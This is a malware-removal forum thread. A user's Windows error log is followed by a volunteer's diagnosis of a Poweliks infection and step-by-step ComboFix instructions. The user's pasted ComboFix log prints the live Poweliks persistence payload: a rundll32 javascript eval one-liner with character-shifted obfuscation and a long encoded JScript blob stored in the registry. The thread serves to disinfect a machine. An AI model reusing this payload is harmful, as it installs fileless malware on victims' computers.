Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\HISTORY-JOURNAL> in the hash map cannot be updated.
Context: Application, SystemIndex Catalog
Details:
A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:53 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA> in the hash map cannot be updated.
Context: Application, SystemIndex Catalog
Details:
A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA> in the hash map cannot be updated.
Context: Application, SystemIndex Catalog
Details:
A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\MANIFEST-000002> in the hash map cannot be updated.
Context: Application, SystemIndex Catalog
Details:
A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA-JOURNAL> in the hash map cannot be updated.
Context: Application, SystemIndex Catalog
Details:
A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\TOP SITES-JOURNAL> in the hash map cannot be updated.
Context: Application, SystemIndex Catalog
Details:
A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\TOP SITES> in the hash map cannot be updated.
Context: Application, SystemIndex Catalog
Details:
A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\LOCK> in the hash map cannot be updated.
Context: Application, SystemIndex Catalog
Details:
A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\LOG> in the hash map cannot be updated.
Context: Application, SystemIndex Catalog
Details:
A device attached to the system is not functioning.
(0x8007001f)

Error: (08/23/2014 04:23:46 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\000002.DBTMP> in the hash map cannot be updated.
Context: Application, SystemIndex Catalog
Details:
A device attached to the system is not functioning. (0x8007001f)

System errors:
=============
Error: (08/23/2014 04:23:55 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (08/23/2014 04:23:32 PM) (Source: WMPNetworkSvc) (EventID: 14325) (User: )
Description: WMPNetworkSvc0x80070424

Error: (08/23/2014 04:23:31 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026)

Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: AVGIDSDriverAVGIDSShim

Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: vToolbarUpdater%%2

Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: AVGIDSAgentAVGIDSDriver%%31

Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Computer Browser%%1060

Error: (08/23/2014 04:13:21 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart

Error: (08/23/2014 04:09:54 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart

Error: (08/23/2014 04:04:22 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart

Microsoft Office Sessions:
=========================
Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000.
This session lasted 228 seconds with 60 seconds of active time. This session ended with a crash.

Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time. This session ended with a crash.

Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time. This session ended with a crash.

Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time. This session ended with a crash.

CodeIntegrity Errors:
===================================
Date: 2014-08-23 16:55:09.878
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:55:09.753
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:55:09.581
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
Date: 2014-08-23 16:55:09.441
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:55:09.223
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:55:09.113
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:55:08.989
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:55:08.879
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:54:50.034
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:54:49.909
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.
==================== Memory info ===========================

Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz
Percentage of memory in use: 54%
Total physical RAM: 3069.46 MB
Available physical RAM: 1392.41 MB
Total Pagefile: 6375.2 MB
Available Pagefile: 4531.66 MB
Total Virtual: 2047.88 MB
Available Virtual: 1882.66 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:223.01 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS
Drive f: () (Removable) (Total:14.61 GB) (Free:13.1 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)
Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 14.6 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=14.6 GB) - (Type=0C)

==================== End Of Log ============================
Naathim Posted August 24, 2014 ID:870669

My name's Naathim and I'm a GeekU Minion! Now that we are mates and will be working together to clean your machine out of any junkware, feel free to call me Naat

Before we start please note the following:
Analysis and research take some time, also sometimes real life gets in the way, please be patient.
Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
Paste the logs in your posts, attachments make my work harder and more complicated.
Stay with me to the end, the absence of symptoms doesn't mean that your machine is fully operational.
Note that we may live in totally different time zones, which may cause some delays between answers.
I can't foresee everything, so if anything unexpected happens, please stop and inform me!
There are no silly questions. Never be afraid to ask if in doubt!
Let's start and enjoy the fight!

Rules and policies
We won't support any piracy. That being said, if any evidence of illegal OS, software, cracks/keygens or any other is revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!
The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!
Failure to follow these guidelines will result in closing your topic and withdrawing any assistance.

You have got a Poweliks infection.
Scan with ComboFix
This is a very powerful tool that should be used only if advised by a Malware Analyst.
Do not run ComboFix on your own!
Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.
If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.
Right-click on icon and select Run as Administrator to start the tool.
Accept the disclaimer and agree if prompted to install Recovery Console.
Do not take any actions while ComboFix goes through your System - it may cause it to stall!
This scan may take some time!
When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).
Include that log in your next reply.

If you encounter any issues with internet connection after running ComboFix, please visit this link.
If an error about operation on the key marked for deletion appears after running the tool, please reboot your machine.
Don't forget to re-enable your previously switched-off protection software!
jjoyner1985 Posted August 24, 2014 Author ID:870716

Hello, Naat. Here's the Combofix log. I see a reference to the Poweliks infection you mentioned.

ComboFix 14-08-21.01 - savas.kyriakidis 08/24/2014 15:26:27.3.2 - x86
Running from: F:\ComboFix.exe
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
<NO NAME> REG_SZ Thumbnail Cache Class Factory for Out of Proc Server
AppID REG_SZ {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
<NO NAME> REG_EXPAND_SZ %SYSTEMROOT%\system32\thumbcache.dll
ThreadingModel REG_SZ Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
<NO NAME> REG_SZ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
a REG_SZ
5*.s,J^Zw9\p1tS&4p#(w&m 4\\iwc}&^uK_oa6q.(6!lf}3w/j:VM+`p&"sxi.s,TH`1!t_sC"UIXI O+]sa\(2e&]h4YC.jeNqsU]Z*?tp4ICVjtg2T7rjswqftA+GAeNH,J6Aw9\%tq}!Dfj3^}j2o2Hox*}.w$pq3A 0.w##4DCVjemF#xH`}v"3x-?yN]p`sB\`5D"VI&pVjfn2g*"jtA}iwAC.I"KqVe\8sw 9g}C.T"jsIHy1wqfgUljo"4H,*#NtX5 YKKy4%iMafm!BA}igri:\*jjj-6:2dp gm#2"o:2s"`sa5j5-i^ipm01p]z}&5jywrc9$}jw91 ]1jfg|j.0ai01!}^t\hOlJyge}C42.0F1`(gGp N$p`s}J8IWITs5lMxU}jwA5!ar sgX}Fg(?A9#[2tfnij9}jw$5?0l5`pDUMO}lww.p`s$} sZ"+N~Kjw$}?Ryjjsc[q\1P.w"lA1]}`sA]hI\]:wX13H:IZhc"CI"}AtXK^9]Cw2\tq.x+C9 Pj8I1 4ftTwA}j\Cm`Nh6:2\i/OjCMg/tsosrG9c9F\HKjs"lA1f}`sA`9tqI2D"j3^}(!3\^+9p[Cg/jU,eb,Mi ^X}Fgu531~pqNA5jxIb%XHUYHeZ}j"3.t?.wf}jwA"M0hi9t\Jy"dINVK^Zh\no9.^(9.mM0Xpotfj\-p`V$p`s!twm\oN7m(9.Cf\&dX06[pgCJ&4p.osfCyt\\iwc}&^(d ]s+b,MIjgzp81(m0H-6w}/Uf1n?w6ij8I1 L\\qT!J&4p}2sfCyo [q9;#j"o:2s\NA5*"L^s..t;pZI$}^I( ,w5jw$[!wA5:1Z]94A}j"}H^}+6w}Xjfg|j.^+qj0l1:AL(M"-p`sop`sB\NNZ5V.~pjST]Kx&m 4FiiwF}jw3+ AB\0IZ}VwA}j9G"jq~mytwd&`.HjV]?0VrCZss5is~..~KCXOcj!qX} DWty4]K`!-e0tx[TwI}jw$".$2p`s5:SA?0s*HA1rt.tH9f1K.j\3^3gY\Fsy} DWej"fN01Xj;,M#igX}Fg!jFtk^p 5!"SH%.KGtB[0N5(u}Gp3w9]f9Zms]#sa5ejxXNZ1P]oW\\ \\6ZO(dX0X4wwn 4KSH%-Sys$[Zwfmi}I.LwsjVxf`[w#9w1P.w"l;,*#0.6[+DW#.zXt22;jZw?5Fw.5`1XNZ1P]^o :/,WSXR.]C4Z5:1!jf9|j.95?o9$Cyo\no1h^(9.ms#5rw}hU&gF?jV+`%X6:AM"obHN:I-J!wA5!ac^T4x]j\/;%XP0Nj o4ve9Kn!t~4ZY9j:x-Ns.5SH%ztZ.A`is~5jj9[!gK"V^\no9I^3w.lVm*i`! 
jo5yJXR.m3#~4ZY9q.zTS2m.I`.Uj`sA"V9742^-j3^LI!tj]3jHj.wop`s$]V,rtP1\Jy"d"j2Gp:Nc9XDoH0sop`sHeZ}j"3.t?.wB}jwA"M1AFzR\Jy1Ap`.$}`s#+9Lj&9-mM4NpNAZt:4BmZs.lG}f#s,w:3sn?I*#VgS1!29ijky}VwU?012]Z6p#Tgy}Fg!jF#_l0Vy5DGNU%*jAs$}^I muNtp&^!#XR*\j]c}sx6}j9-pj}+6w}&jfg|j.\C(!4GmZY9j a"mZs.lwjzty1Y9+,KSy^s]C4Z`Vt8 9.^Fw.l;,*#0V6[+DW[(^P2H:I^I9L4 |ZY"?0Vt As3` t`.xI*#L^S1!29eUgL}&9-lwjz8Zst}f^c}Fg!jX1W.0F69 DG.U%*.^.J^Zw9js}7K3Xoj3^`Z1M#U^y}FguI_t$[2w&]VxIe9F`o Is%\9!jhp`}}SZ} i29f`TNnj3g]#1\mk12Ho"(}jw$pqsU}Z*j}qw\#.9-5:owp2tf`!\]+_N K`F]^ytA9Ts~p.z*#V9S1!29t%0hj3xP?^99iqH\no9x^(9.mM^.NyYC5jw}lAV-p`s$}^}t5Tstp&^!#&4&j3q1ipgW}3w$p`s}6w}wjf9|j.^}"j]Vj;,M\3gzp81!jj}OCA.y` YK5.z*i2wA5XOqPfgSj.\rS.2TiA.M]s\\j24"U!sq5b,Mj^zp81uSZtu^ZY9I%52l9.CM0ct&2hP+ajH?R-Syt%}NAn#+aAjx9.5?0.jqY9:g!.AIoKAVjj`sA5ip7IV99^3gK" 2.]3jHj.^epqIjt0tZ#p9c}&^oj2o~p`2 9&I-I^wPm01P]yw."3.t?.\}J!\5&BfiT4X}XR*.s6J^Zw9eilIP.w"mZ0.jqY9`f4 4ZY"?0Vii;% 9f57IVaP^3gK" 2.]3jHjI*H`.$8ZY9t%4j2DfU3s^mZh\s9#moN.lV%a}otfio7KV\fn2g*UZ1r#h9c}&^(SZ* iotfniT\PV\$2Hl?;,rj(9*p2V!42A\]`w9jh}7I`-JXR!92#|}f^2n2x*}^td\q9x6ow}[ywp:f[x?_1j5.w$p`}CA!-6jtg"Iwp.w]J!wA5(s1]3A!P."]1Z*5e.9rnUthP:aU.s$jo.}tL^TKAIUH83z#sF}`".$5L&A^!8jmyoHCV^FPa]NZ65e..H]!k6PMaB2X:1_tHmV`"K2wop`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA#s\Ap`s$]`sA}iwf}jw$5?07rAsA:M9$p`s$p`s$}`sf\Ts~pjw$}jwA5j1qH+On}jX]? 
wP].IA#parj.\V1MB$KoV95yjo.A.fN`I]8yYI5is~pj\/]3wA53qAii^A62aiN8.f}`sA}iwA}jw$5K]~p`199&g/pyN$p`N$}`sAU tap9$}jwA5FLh8i^f}jx$p`s$}oNA}iwA}jw$`jo;p`sA5jw9p`s$I0s$]`sA5is~pjw#}jwI5joA}iwA}jO/l`sU}`1A}ig5iFw$5jo p`sA`jw$I`s$p`.$}`sA5is"pjw$ijwA5joA}iwA]jw$p`s$}`sA}iwA}jw$5jo}psVA1M99p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~p.~3i.^xUVsA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sHm"s".D #sjv"jo&]T^f}jx$p`s$}qFA}iwA}9$5jo~p`sA5jw$p`s$p`s$}`2!5is~12tqPVjMU3t.\i8*#9#p`s$]ws}tT^A}:9$5joG}ZsA5jw$p`s$p`s$}`sA5is~pjO$}jwn5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$pqI5jo.1#!Dyjx~-m!o~p^}AU(\"}y.f.`sU}`sA"sw7p3wo}jw9t3tAPfK*JXRXjU%"#`VA]ozXC.4etZ1W.0VA"2w$I`Vep`pTiyIA5is~pj\V#F\Y(!]f8oa6}.9U.Zs9Cw}M#ixsi(x9U.)7lb,jjfKN9 4wwt#sFf`i.w.:XhJ!\.5(#LPoj9\M9}?0jXCb%6nU\Vjj4jI.$dpjN1`s\hpq1jl0sdPZw?\UW7H(9$H":f$IHu5*]2x9KAtity!h]h^s]C9p\!BXj`NL\V`-wsUpjI9toV(: j7.Os}OAI.(FiVS\tM\Up`2-t_ssi906]s~H5&$5S8IctsTA.2N$p`s+6:2\`9tqK34J[!x:5yo(]#" 8sgXK`s$]_N563OCj ^r2}X.VtHmFw.p0V"pU,f82m\o}"I&g/62"}5jaI}VwZ}j^3Ky.f]`sA]3x/ts"pxtU}2}\UFaUrj5-p^t$Cw1K`395KLx/6sjZ"23&[""3}y4$pU,Un`sWCU92}jwj53BGN2tA53g3+As$jqm-tZ13j!1+r9rJ!lpjjqI]%4Aix\Hjw.-].sM]iDq j"i(F]lpqN|gyjsj.5SZ}3]Gss"pN p(9HnL&h:jo; !gZCMIXHqwd6As58f\2#y4;"2TWp`s&\Fw$.j}!.VV*\j1sU!t"Nsw!tyt61!OA} ^An(^r}H%feZVD}pjfP2wH:XO~.NAZI:X$IZsHjqw iqYM"Vwop39UJ!wI}2ow[T\?PK~3?0*+}0sC#uaIj2g g2t\?At!\M43NZsG4ZsXCAs95V97KjwUij^I"2i t+&\t2g]l2.$}`wA}TwA8&aBsHH?`9s`2&-wsG52oT]0NsIftNjjwT#F\D13B9tqjv}VzX?G}fjow/[T^D]jx3d!tUlqVy:!lhp Vupst5Cw9qjVI;+sw(^sx9tj4Ajpt*}jxjN8IBi0II8VjMHM9/\L4;rGp\V9].^N/m`s t_m\} 57k:\unv^25voajqwztc9u1wtgtzyi}qwm}v9ot.v.rw}n5x4urv,"h`1$ tri}~jl~\nsTc"K[9[38Zi!gjIyN%eyNsiVwA}j"+9 
HZ|ZpD5!xXpqNKI_V}6q}59%A;l(43]yI\I&$AHo~yt29-pq2aC_sl#+w|iV^f`.[_m_V2:!gBmV.t.2VU}8sS5T,nmMgr]!wAm.#(]+Ov]299? AP qY&[Tg}#!9-9j]dp0wxI.\u+VN9589KPZwMq ,~4!wttFgWqjdc\38Ae!\*Iq2q#qF?\+g1#j^jI3eWjN3"x9oNZF+I.V5 sF55#9gp!w}#.x5mC$1jixr}V^$4j5z N95P#w3}:D/(.4hj`*y5aop`I$H`1HnVN3jUtwI283\2\DqLB5j#"1}3a$4`w;tV1c}U9YiLj$qs2VNZ.2`j.j N/4VI!]At?I tl5L~jC:Oy53O?[#^E^!4HpqH* 0}ytTgHnj\%5s24VFxt D"IZt#p`wt[_t1UPsql3"H}?O*9xs;is&DCX]p`}t[2Vj9x16(gB5.oI.`N?gsz-IAtFp:}UCAs/gT,A2O%P(gMmj4y]+as^y~UI`sBP:1(j#^pPj9$:(Hx}Zty\ a!m8VUI^s\j`VW"3} jMj$P38n5 t(P#9V\3^ KyY CA.58VjW]!wq9&t p2NCUj*4 9*ot]H mXU#mM.!^PJ&^A5x^Dj3xHPjXj?`V]t2N(P#^pPjO9IyB~j02yt4ojAN9}w.Ui0s t wwNL^G]V~&5!oX# 4.ijD*IGs$]0s5jh\& f4]dyBx}02yjxemst/H`2TCyN\i9NHsj]H3AF9!\h]#t\\3jPN V!#`sI]uwA^38}jVoV48t}5jAAljb*}2pTHAsD"PI;S&0*PVx:\y[?ii"de opk^9ri^stt5\#:\9:zoxh`56:dph_n5}z1hi 9s"+3w53wuc2x\js[?}iw&HszAjAFUtGs:eiwC62T.\MsV?Z.q9 a/58.2+w93#`V."#V5m!^UJF5\(!oLPu"s\sj2.0sij`ID]f0X^yx]9!*2K`V\U.gf?Z6}ls99eZsy:+tN4jj* Cg3\ XxP3w\nC4/1V9/8ZIZi!jHt9]"s2Dj_N2tjxoj_V2KqYTP0.2iIIN3w5j28&5X1fPT^9P!xHN2V/t0sA}ixZ8f^iUjoxm8AA}M9f.q5.1Zsu6w935f.tC9$]jA6ty} n9\H}(99I N(CZ}2H+\AHx9$UMVSH.I;j.wBpos91`1KiZ9AU YA}y4H]jx9:K[Ajo43n.w9I_tf}j.xn%4AtMxq:M2MpyY612"tp0hf4Z1$8ZVAqp}\?yAT\2Ac\!ox\s4&}jO"Hq3a#`2!]!X624HtM2q`2D:34a}A1uKs.]tZswjsoSIf9% sa\jj(h8swHt j\SZpzP`sA}VjZj2wJ"C42K;,A"KtA}V.#psIh}`IA:P}t5FwP]L^Eq2#Ajp"9i2^TK`19C_ss}ix6}""U!3Wlb%hqjx(p`s m`Y+6j5\"fA~?&95[yjjjj] js4183\PNy6-]`}y hx.Cs~993B Iw.(:.&+p^we`W*#H,I"iqSpO$[jXA:!]ZP#w1C.5aHGV]8s,|[Tj}jw9"x[_}Zsl(!"].ZV51b,A}0s3g3sD+2xC^&gMg3oc^+9AJ&^$.sN6e22&]Vgri:wUs#V}qwfm&^3jsY/N2}!} V3j#.GIV4[st\:Mas}VK6}!\K^s-jAN6[V4p .46I!s;HAICt&a$SymXjyNCt:ty9sbljjj2 :w&UVs4Z#jXPp`Fu#qYIjogDi8Vt ]`.:s/qMx!IsYt+^V/ij}LUis;pjSXnV5y\A*8jOC "2?wV3Pq}A]!xA[M9p5 4&p:t.Uj\O?ZVTI01$]NA9q#bZ? 
l#e as5jtjnsjM#3j\IZNo _1W6P~2Hx9pm:HG+VNZm2j%pbY"K;,*#ZV2(isa:99n.9S:.\\6#akPFTaN;,B^ VA[TwY]4/\ 24.2VV9F\hm V*jAY3}yo!!6`12O#jjOIg A #sT!#X41y1U]o9AiP4VH.9O5x[:?`sY53Ta;,urV1j^wsK"hNV?jDF8j89q2BX8+xA]jR+?:1]PZw?t!9;}Od"LHxjy9Mj3O6js}I0q-}s/h1pN2ls^$nM^IUj1c}ig|}:lelyVe V,Mi O3]s^T1!4:IqsY`O*l_tF.01;#`V\5%t8p!gAiFK&Uf]1}ilwekOj:A\}^VcjigFP:"s(K4bp`NI5V"i4j2fSy.6Pswq1TFA5.gFt2^\`CHHjsx(]s"\+s*X :t/iq^cHw"( [lp^I.tjlArVN2mysij sj` tWIXG#Mx.U&osjig3j3g/}0WT]`9yiP0F6M9G\f#n1AHc5K^iN8wo40.9 N!jhNwHMwF] D9g2]ii4xP(9u}y,ieZjc\qw*Jyg#j#\I2.nM9O.j.VN Apejsw`Vs2}y4Pt!w*":1A]!Dp6K0X.Asj[b,C+I\]:wjtj2yI mh"C^jK_Nolq3*tV}f`V*"I24#\3\MtsBtt+46Jy^Bp0sr]:.:to^Z#j8s\x#yIjA.(!96K0NA.85fH`FKU#A4p O$] 8cdF3Xj gptFIq1NAH[A9c6il}^2w \x4wp }nm24CpZsU?0V;i09|1o.wKy~e[ "?gst2}pA!i!4FjjV]]..|tT^cjf~/gV4xpqYf5.4GNw9$4yV# VIA\pWXpjUtjx\"22At!9k[!I-H.9!Hswqt"4A\!R*j(sx1^9&(jxOI`VGr`9t\N2 :TVo}!k+8 9Zx#DPfw2}ywV5^.!t`sf\!jq}5TjM[;}wst" ^;p`NBjyso}^9.5V97?F"Gijj95]CJTA& j^Ulw}}]A,s\Twj3^9m.BGIqNw}jaTp^.fp8}] NAD(3I0m 9GCMa1qBZPVt!]3w9IsNCHqV}i""IC9/`(#wH`t1(V4!jHY2.:V]}Zhc5i,Vrl]Hw15(]snoj&]&g4I`*jnwqh[Tx3i2XH`3q~lAFy5jXh+`VU4Vt9]oAw}!w713X##Fx:K]1C!DA\y^*j2Vp}o9.ji4y}!a2tj#$H:tZ\!gGK0s(pjsK[A}tUqVoHj\2jj4*\2H6nijI[ x#I8NGe2AlPo\}iKjg:[Nl.p\}.KzI N pyw#tZ9A"%}dIjj9]K~Eqf#1if\Zt4UI^H.C`sf]P"1ijxd:42NqtYj3\p5^}KINt}]0NC"V.hmsa$}L9}5.$WtP46}(au+N96PjAInp&\\?D]"Ha}8}M:.g]?s9opqm-tZIC5jYANK45}.g/q(2*eig|j3\dN2N\6qW\]iw96j8."Fi2m.II"jw]IAI\pqs}6V.f"V1Um!XUt:Dx9M[j[T"v^O+IG.PiZm6i t&nMlC9Kt:jjwZ:^BmytVlwIKe8}KgTHZN3gJ}j4r5!#y} 9 P 99KAsHC`hDJTODCV43d 4lpoNE":43l2NPjj./jyss`"VV?jO2i8/`VBx]3wS}(9252V]8qwH]T^5#jxVjK]5p^ALj3^B?`t]ps3-}`wH:#.qN Tq}.an9yoA}#wA8 gP+wjf]AVC\qj5Jy"o\ ohIj9V`&\jwNP}8V9#ysA` tSN!8oej\Y(!oZi+Dk#jSAm`9Pt82!t!OC j9-9&4 .Z.ZmLjF1AVdj^.H ^9|32HpLx/\jaI: \h[!4k C~!m0,*P_w68+DZtC\qtjOX.`WX`jx]5yNajj}VjwV.}oI jjx\}VgX9FBX}ijK 2w\pNA Cs9k]T\Ln.~hdF[n4`spm&ajN8m.jqVTiA9to}:j34G821!qf)\}q9Lj3^"SHY!tAF.63^Ajf&T5V#Klw.&sTa.0FHI^o*Pstj} .K5Vg\J XImM]s]%~Y}.wKp0}6Cy2!i#~*}!g$tj4d0s?`.xeN 
